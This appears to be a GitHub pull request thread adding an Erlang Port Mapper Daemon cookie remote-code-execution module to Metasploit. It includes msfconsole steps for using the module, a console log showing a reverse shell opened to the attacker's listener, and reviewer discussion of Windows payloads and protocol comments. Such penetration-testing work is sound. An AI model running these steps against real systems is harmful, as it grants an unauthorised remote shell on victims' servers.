Erlang cookie rce exploit module

[wetw0rk]

Erlang Port Mapper Daemon Cookie RCE

The erlang port mapper daemon is used to coordinate distributed erlang instances. Should an attacker get the authentication cookie RCE is trivial. Usually, this cookie is named ".erlang.cookie" and varies on location.

Verification

This exploit was tested on a fresh Ubuntu 16.04.5 LTS, however it should work on any Linux/Unix system.

• Start msfconsole
• use exploit/multi/misc/erlang_cookie_rce
• set COOKIE EXAMPLE
• set RHOST 127.0.0.1
• set RPORT 25672
• exploit

msf exploit(exploit/multi/misc/erlang_cookie_rce) > exploit 

[*] Started reverse TCP double handler on 192.168.245.146:4444 
[*] A.B.C.D:25672 - Receiving server challenge
[*] A.B.C.D:25672 - MD5 digest generated: c8cf8d1d4a1416023a27405c30e0d38f
[*] A.B.C.D:25672 - Sending challenge reply
[*] A.B.C.D:25672 - Challenge sent, sending payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Pj98zUYj3ZxLHfZl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Pj98zUYj3ZxLHfZl\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (W.X.Y.Z:4444 -> A.B.C.D:50026) at 2018-12-08 22:41:00 -0600

id
uid=122(rabbitmq) gid=130(rabbitmq) groups=130(rabbitmq)

[wetw0rk]

Let me know if you guy's want me to change anything else. Been a while since I did a contribution so might be sloppy haha.

[OJ]

This should work on Windows as well (but test to be sure). And hence, doesn't belong in the unix namespace, please use multi.

[h00die]

Please add documentation, see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

[wetw0rk]

Let me know what you guy's think of the changes made. @OJ you were right it works on a windows install however I can't get the powershell base64 encoded payload to execute 🤔 any thoughts?

• Node length has been made dynamic as helped by @bcoles
• Could not get encoded payloads to work (maybe I'm doing something wrong?)
• 'user' string unchanged apart from neater organization
• COOKIE check was made (server returns NULL if incorrect)
• Removed 'digest'

I also added documentation as requested 😄

[OJ]

Maybe it's due to payload length on the command line? Which Windows payload are you trying?

[wetw0rk]

Maybe it's due to payload length on the command line? Which Windows payload are you trying?

I tried using cmd/windows/powershell_reverse_tcp, as well as incorporating the cmd/powershell_base64 encoder. I don't think it's the length I think it may be the quotation marks and lack of escapes or something.

[acammack-r7]

I would prefer that the protocol chunks were documented better, with each term labeled for what it does. The Erlang documentation on the subject is pretty comprehensive, and the BERT project can help test out individual items.

http://erlang.org/doc/apps/erts/erl_dist_protocol.html
http://erlang.org/doc/apps/erts/erl_ext_dist.html
https://github.com/mojombo/bert

[wetw0rk]

I would prefer that the protocol chunks were documented better, with each term labeled for what it does. The Erlang documentation on the subject is pretty comprehensive, and the BERT project can help test out individual items.

http://erlang.org/doc/apps/erts/erl_dist_protocol.html
http://erlang.org/doc/apps/erts/erl_ext_dist.html
https://github.com/mojombo/bert

Went ahead and added the appropriate comments to the packets being sent. Let me know what you think.

[acammack-r7]

This is much better, thanks! It will help a lot if we ever need to update it or run into a bug.

[wetw0rk]

This is much better, thanks! It will help a lot if we ever need to update it or run into a bug.

No problem 😄

[jmartin-tech]

@msjenkins-r7 test this please.

[jrobles-r7]

Release Notes

The Erlang Cookie RCE module has been added to the framework. This attempts to authenticate to an Erlang Port Mapper Daemon with a user provided cookie to run commands on a remote server.

[wetw0rk]

cheers 🍻

[jrobles-r7]

@wetw0rk thanks for the contribution

[mubix]

This is awesome! Nice work!

[wetw0rk]

Thanks guys happy to contribute 😄 🎉